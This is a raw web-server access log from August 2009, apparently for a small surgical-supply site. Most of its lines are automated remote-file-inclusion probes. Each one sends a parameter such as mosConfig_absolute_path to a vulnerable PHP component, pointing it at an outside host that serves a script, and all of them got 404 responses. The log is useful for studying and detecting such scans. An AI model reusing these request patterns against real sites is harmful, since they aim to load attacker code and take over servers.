216.14.113.10 - - [02/Aug/2009:04:18:49 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
216.14.113.10 - - [02/Aug/2009:04:18:53 -0400] "GET /logs/access_log.Q109051500%20%20//modules/xfsection/modify.php?dir_module=http://joaogay.webs.com/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
221.161.196.26 - - [02/Aug/2009:04:20:29 -0400] "GET /logs/access_log.Q109052200///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
89.149.194.189 - - [02/Aug/2009:04:21:01 -0400] "GET /logs/access_log.Q109060300//authentication/smf/smf.functions.php?pConfig_auth[smf_path]=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 262 "-" "libwww-perl/5.79"
72.30.81.182 - - [02/Aug/2009:04:22:16 -0400] "GET /logs/error_log.Q107092200 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.59.12.99 - - [02/Aug/2009:04:22:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.110.19.24 - - [02/Aug/2009:04:26:08 -0400] "GET /logs/access_log.Q109070300%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:27:45 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
213.171.225.234 - - [02/Aug/2009:04:27:48 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
211.110.19.24 - - [02/Aug/2009:04:28:31 -0400] "GET /logs/access_log.Q109060200%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:31:13 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:31:13 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:31:13 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:04:31:14 -0400] "GET /logs/error_log.Q109062700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:04:31:14 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:04:31:15 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
122.201.81.6 - - [02/Aug/2009:04:31:24 -0400] "GET /logs/access_log.Q109072300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:31:32 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:31:32 -0400] "GET /logs/access_log.Q109052900///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:31:32 -0400] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:32:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
122.201.81.6 - - [02/Aug/2009:04:33:00 -0400] "GET /logs/access_log.Q109072300///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
216.104.15.142 - - [02/Aug/2009:04:33:50 -0400] "GET /favicon.ico HTTP/1.0" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.171.225.234 - - [02/Aug/2009:04:34:04 -0400] "GET /logs/access_log.Q109062700/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.6.149.44 - - [02/Aug/2009:04:34:22 -0400] "GET /images/items/EcOm/drillingbonekit_full.jpg HTTP/1.0" 200 10858 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
122.201.81.6 - - [02/Aug/2009:04:34:24 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:34:32 -0400] "GET /logs/access_log.Q109072300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:34:45 -0400] "GET /logs/access_log.Q109052900%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:34:48 -0400] "GET /logs/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:34:48 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:34:48 -0400] "GET /index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:34:48 -0400] "GET /logs/access_log.Q109060500%20%20/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.201.81.6 - - [02/Aug/2009:04:34:53 -0400] "GET /logs/access_log.Q109072300%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://povervsebya.ru///id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:35:16 -0400] "GET /logs/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:35:16 -0400] "GET /logs/access_log.Q109060500%20%20/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:35:16 -0400] "GET /index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:35:16 -0400] "GET /logs/access_log.Q109060900%20%20/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:04:35:35 -0400] "GET /logs/access_log.Q109061400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:36:13 -0400] "GET /logs/access_log.Q109060500/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:36:13 -0400] "GET /logs/access_log.Q109060900/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
213.171.225.234 - - [02/Aug/2009:04:36:46 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:04:36:47 -0400] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:04:36:47 -0400] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 253 "-" "libwww-perl/5.805"
80.73.192.55 - - [02/Aug/2009:04:37:05 -0400] "GET /logs/access_log.Q109060500/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:37:05 -0400] "GET /logs/access_log.Q109060900/index.php?search=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:37:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.80.7.120 - - [02/Aug/2009:04:38:45 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:04:38:51 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
125.244.77.2 - - [02/Aug/2009:04:39:00 -0400] "POST /_vti_bin/_vti_aut/author.dll HTTP/1.1" 404 226 "-" "core-project/1.0"
72.30.81.182 - - [02/Aug/2009:04:39:27 -0400] "GET /logs/error_log.Q108010300 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
213.171.225.234 - - [02/Aug/2009:04:40:31 -0400] "GET /logs/access_log.Q109071100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
209.59.12.99 - - [02/Aug/2009:04:42:46 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.3 - - [02/Aug/2009:04:43:23 -0400] "GET /logs/access_log.Q109051600//components/com_lmo/lmo.php?mosConfig_absolute_path=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:43:24 -0400] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:43:24 -0400] "GET /logs//components/com_lmo/lmo.php?mosConfig_absolute_path=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 230 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:43:25 -0400] "GET /logs/access_log.Q109071200//components/com_lmo/lmo.php?mosConfig_absolute_path=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:43:27 -0400] "GET /logs/access_log.Q109071200//components/com_mambowiki/Mam***ogin.php?IP=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:43:28 -0400] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:43:28 -0400] "GET /logs//components/com_mambowiki/Mam***ogin.php?IP=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.805"
201.80.7.120 - - [02/Aug/2009:04:45:02 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
201.80.7.120 - - [02/Aug/2009:04:45:07 -0400] "GET //index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 208 "-" "-"
213.171.225.234 - - [02/Aug/2009:04:45:27 -0400] "GET /logs/error_log.Q109061400/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:46:10 -0400] "GET //components/com_mambowiki/Mam***ogin.php?IP=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:04:46:30 -0400] "GET /logs/access_log.Q109071100/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
213.171.225.234 - - [02/Aug/2009:04:46:31 -0400] "GET /logs/access_log.Q109051600/administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indo.home.ro/idrom.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
77.221.130.3 - - [02/Aug/2009:04:46:35 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:46:35 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:46:35 -0400] "GET /logs/access_log.Q109061200%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:46:35 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:46:40 -0400] "GET /logs/access_log.Q109062900%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:46:40 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:46:40 -0400] "GET /logs/access_log.Q109061200%20%20//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:46:40 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:46:53 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:46:57 -0400] "GET /logs/access_log.Q109071700//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:46:57 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:46:59 -0400] "GET /logs/access_log.Q109062700//components/com_mambowiki/Mam***ogin.php?IP=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.805"
211.110.19.24 - - [02/Aug/2009:04:47:01 -0400] "GET /logs/access_log.Q109071200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:47:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
77.221.130.3 - - [02/Aug/2009:04:47:50 -0400] "GET //components/com_lmo/lmo.php?mosConfig_absolute_path=http://theadezagroup.com//v-webmail/includes/mailaccess/kontol.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
80.73.192.55 - - [02/Aug/2009:04:47:52 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
80.73.192.55 - - [02/Aug/2009:04:47:52 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:47:59 -0400] "GET /logs/access_log.Q109062900//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
77.221.130.3 - - [02/Aug/2009:04:47:59 -0400] "GET /logs/access_log.Q109061200//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://prayudi.freecoolsite.com//administrator/components/com_babackup/classes/fx29id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.149.194.189 - - [02/Aug/2009:04:48:03 -0400] "GET /logs/access_log.Q109053100/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 276 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:48:04 -0400] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
89.149.194.189 - - [02/Aug/2009:04:48:04 -0400] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://impeel.com/impeel/web/css/pit-id.txt? HTTP/1.1" 404 254 "-" "libwww-perl/5.79"
211.189.39.159 - - [02/Aug/2009:04:48:52 -0400] "GET /logs///skin/zero_vote/login.php?%20dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.189.39.159 - - [02/Aug/2009:04:48:52 -0400] "GET ///skin/zero_vote/login.php?%20dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
211.189.39.159 - - [02/Aug/2009:04:48:52 -0400] "GET /logs/access_log.Q109051200///skin/zero_vote/login.php?%20dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.39.159 - - [02/Aug/2009:04:49:02 -0400] "GET /logs/access_log.Q109053100///skin/zero_vote/login.php?%20dir=http://bangsat5.fileave.com/id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
86.96.227.87 - - [02/Aug/2009:04:49:45 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
86.96.227.87 - - [02/Aug/2009:04:49:45 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
86.96.227.87 - - [02/Aug/2009:04:49:46 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
86.96.227.87 - - [02/Aug/2009:04:49:46 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; InfoPath.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
74.6.149.44 - - [02/Aug/2009:04:49:47 -0400] "GET /images/items/45419001_THUMB.JPG HTTP/1.0" 200 14901 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
211.110.19.24 - - [02/Aug/2009:04:50:00 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:50:04 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:50:04 -0400] "GET /logs/access_log.Q109071700//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:50:09 -0400] "GET /logs/access_log.Q109071200//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:50:50 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:50:50 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:50:50 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:51:12 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:51:31 -0400] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:51:31 -0400] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:51:31 -0400] "GET /logs/access_log.Q109052400/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:51:36 -0400] "GET /logs/access_log.Q109060300/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 293 "-" "Mozilla/5.0"
209.59.12.99 - - [02/Aug/2009:04:52:47 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
201.232.54.48 - - [02/Aug/2009:04:53:04 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:06 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:06 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:07 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:08 -0400] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:08 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:09 -0400] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:09 -0400] "GET /logs/access_log.Q109051700//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:09 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:09 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:09 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:10 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
211.110.19.24 - - [02/Aug/2009:04:53:10 -0400] "GET /logs/access_log.Q109062800/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
